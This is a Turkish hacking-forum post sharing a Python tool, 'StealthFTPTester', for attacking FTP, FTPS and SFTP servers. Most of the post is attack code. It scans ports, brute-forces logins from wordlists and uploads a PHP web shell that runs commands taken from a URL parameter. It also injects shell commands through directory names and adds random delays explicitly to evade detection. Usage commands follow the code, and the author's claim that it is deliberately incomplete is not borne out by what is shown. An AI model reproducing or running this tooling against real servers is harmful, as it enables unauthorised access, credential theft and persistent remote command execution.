Merhaba değerli TurkHackTeam üyeleri başlıktaki gibi konuya geçelim.

İlk önce gerekli kütüphaneleri indirelim.
Kurulumdan sonra
Şimdi gelelim bazı komutlara
Komut yükleme: python stealth_ftp.py -s ftp.example.com --inject "id"
otomatik payload: python stealth_ftp.py -s ftp.example.com --auto-payload linux
NOT: Tam olarak yazmadım kötüye kullanılmasın diye.

İlk önce gerekli kütüphaneleri indirelim.
Kod:
pip install cryptography paramiko aiohttp python-nmap
sudo apt install nmap
Kurulumdan sonra
Python:
import asyncio
import ssl
import ftplib
import paramiko
import socket
import subprocess
import os
import sys
import logging
from typing import Optional, List, Tuple
from datetime import datetime
from cryptography.fernet import Fernet
from aiohttp import ClientSession
from random import randint
import base64
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
key = Fernet.generate_key()
cipher = Fernet(key)
class StealthFTPTester:
def __init__(self, server: str, port: int = 21, protocol: str = "ftp", use_proxy: bool = False):
self.server = server
self.port = port
self.protocol = protocol.lower()
self.use_proxy = use_proxy
self.username = "anonymous"
self.password = ""
self.connected = False
self.session: Optional[ClientSession] = None
self.ftp = None
self.ftps = None
self.ssh = None
self.sftp = None
self.log_file = f"ftp_{datetime.now().strftime('%Y%m%d_%H%M%S')}.enc"
async def _encrypt_log(self, msg: str):
with open(self.log_file, 'ab') as f:
f.write(cipher.encrypt(msg.encode()))
print(f"[*] {msg}")
async def _proxy_connect(self):
if self.use_proxy:
self.session = ClientSession()
await self._encrypt_log("Proxy bağlantısı aktif")
async def network_scan(self) -> List[Tuple[str, int]]:
try:
result = subprocess.check_output(['nmap', '-p', '20,21,22', self.server], text=True)
ports = [(self.server, int(line.split('/')[0])) for line in result.splitlines() if "open" in line and any(p in line for p in ["20/tcp", "21/tcp", "22/tcp"])]
await self._encrypt_log(f"Tarama sonucu: {ports}")
return ports
except Exception as e:
await self._encrypt_log(f"Tarama hatası: {e}")
return [(self.server, self.port)]
async def connect(self, username: str = "anonymous", password: str = "") -> bool:
self.username, self.password = username, password
await asyncio.sleep(randint(1, 3)) # Anti-tespit için rastgele gecikme
try:
if self.protocol == "ftp":
self.ftp = ftplib.FTP()
self.ftp.connect(self.server, self.port)
self.ftp.login(username, password)
elif self.protocol == "ftps":
self.ftps = ftplib.FTP_TLS(context=ssl.create_default_context())
self.ftps.connect(self.server, self.port)
self.ftps.login(username, password)
self.ftps.prot_p()
elif self.protocol == "sftp":
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.ssh.connect(self.server, port=self.port, username=username, password=password)
self.sftp = self.ssh.open_sftp()
self.connected = True
await self._encrypt_log(f"Bağlantı: {self.server}:{self.port} | {self.protocol}")
return True
except Exception as e:
await self._encrypt_log(f"Bağlantı hatası: {e}")
return False
async def vuln_check(self):
checks = []
if await self.connect("anonymous", ""):
checks.append("Anonymous login")
if self.protocol in ["ftp", "ftps"] and self.port != 21:
checks.append("Non-standard port")
await self._encrypt_log(f"Açıklar: {checks}")
print(f"[VULN] {checks}")
return checks
async def brute_force(self, usernames: List[str], passwords: List[str]) -> Optional[Tuple[str, str]]:
async def try_login(user: str, pwd: str) -> Optional[Tuple[str, str]]:
if await self.connect(user, pwd):
return user, pwd
return None
tasks = [try_login(u, p) for u in usernames for p in passwords]
results = await asyncio.gather(*tasks)
for res in results:
if res:
self.username, self.password = res
await self._encrypt_log(f"Başarılı: {res[0]}:{res[1]}")
return res
await self._encrypt_log("Brute-force başarısız")
return None
async def generate_payload(self, target_type: str = "generic") -> Tuple[str, bytes]:
payloads = {
"generic": b"<?php system($_GET['cmd']); ?>",
"linux": b"#!/bin/bash\necho $USER",
"windows": b"@echo %USERNAME%"
}
payload = payloads.get(target_type, payloads["generic"])
remote_file = f"payload_{randint(1000, 9999)}.{target_type}"
await self._encrypt_log(f"Payload oluşturuldu: {remote_file}")
return remote_file, payload
async def upload_payload(self, local_file: Optional[str] = None, remote_file: Optional[str] = None, target_type: str = "generic"):
if not self.connected:
await self.connect(self.username, self.password)
if not local_file:
remote_file, payload = await self.generate_payload(target_type)
local_file = f"/tmp/{remote_file}"
with open(local_file, 'wb') as f:
f.write(payload)
try:
with open(local_file, 'rb') as f:
if self.protocol in ["ftp", "ftps"]:
(self.ftp if self.protocol == "ftp" else self.ftps).storbinary(f'STOR {remote_file}', f)
elif self.protocol == "sftp":
self.sftp.put(local_file, remote_file)
await self._encrypt_log(f"Yükleme: {remote_file}")
print(f"[+] Yüklendi: {remote_file}")
except Exception as e:
await self._encrypt_log(f"Yükleme hatası: {e}")
async def inject_command(self, command: str):
if not self.connected:
await self.connect(self.username, self.password)
payload = f"test;{command};.txt"
try:
if self.protocol in ["ftp", "ftps"]:
(self.ftp if self.protocol == "ftp" else self.ftps).mkd(payload)
elif self.protocol == "sftp":
_, stdout, _ = self.ssh.exec_command(command)
result = stdout.read().decode()
await self._encrypt_log(f"SFTP komut sonucu: {result}")
print(f"[+] Sonuç: {result}")
await self._encrypt_log(f"Enjeksiyon: {payload}")
print(f"[+] Denendi: {payload}")
except Exception as e:
await self._encrypt_log(f"Enjeksiyon hatası: {e}")
async def close(self):
if self.protocol in ["ftp", "ftps"]:
(self.ftp or self.ftps).quit()
elif self.protocol == "sftp":
self.sftp.close()
self.ssh.close()
if self.session:
await self.session.close()
self.connected = False
await self._encrypt_log("Kapatıldı")
async def main(args):
tester = StealthFTPTester(args.server, args.port, args.protocol, args.proxy)
await tester._proxy_connect()
if args.scan:
targets = await tester.network_scan()
tasks = [StealthFTPTester(t[0], t[1], args.protocol, args.proxy).connect() for t in targets]
await asyncio.gather(*tasks)
if args.vuln:
await tester.vuln_check()
if args.brute:
with open(args.brute[0], 'r') as uf, open(args.brute[1], 'r') as pf:
usernames = [line.strip() for line in uf]
passwords = [line.strip() for line in pf]
await tester.brute_force(usernames, passwords)
if not tester.connected and not args.brute:
await tester.connect()
if args.inject:
await tester.inject_command(args.inject)
if args.upload:
await tester.upload_payload(args.upload[0], args.upload[1])
elif args.auto_payload:
await tester.upload_payload(target_type=args.auto_payload)
await tester.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Stealth FTP Tester')
parser.add_argument('-s', '--server', required=True)
parser.add_argument('-p', '--port', type=int, default=21)
parser.add_argument('--protocol', choices=['ftp', 'ftps', 'sftp'], default='ftp')
parser.add_argument('--proxy', action='store_true')
parser.add_argument('--scan', action='store_true')
parser.add_argument('--vuln', action='store_true')
parser.add_argument('--brute', nargs=2, metavar=('users', 'passwords'))
parser.add_argument('--inject', type=str)
parser.add_argument('--upload', nargs=2, metavar=('local', 'remote'))
parser.add_argument('--auto-payload', choices=['generic', 'linux', 'windows'], help='Otomatik payload')
args = parser.parse_args()
asyncio.run(main(args))
Şimdi gelelim bazı komutlara
Komut yükleme: python stealth_ftp.py -s ftp.example.com --inject "id"
otomatik payload: python stealth_ftp.py -s ftp.example.com --auto-payload linux
NOT: Tam olarak yazmadım kötüye kullanılmasın diye.



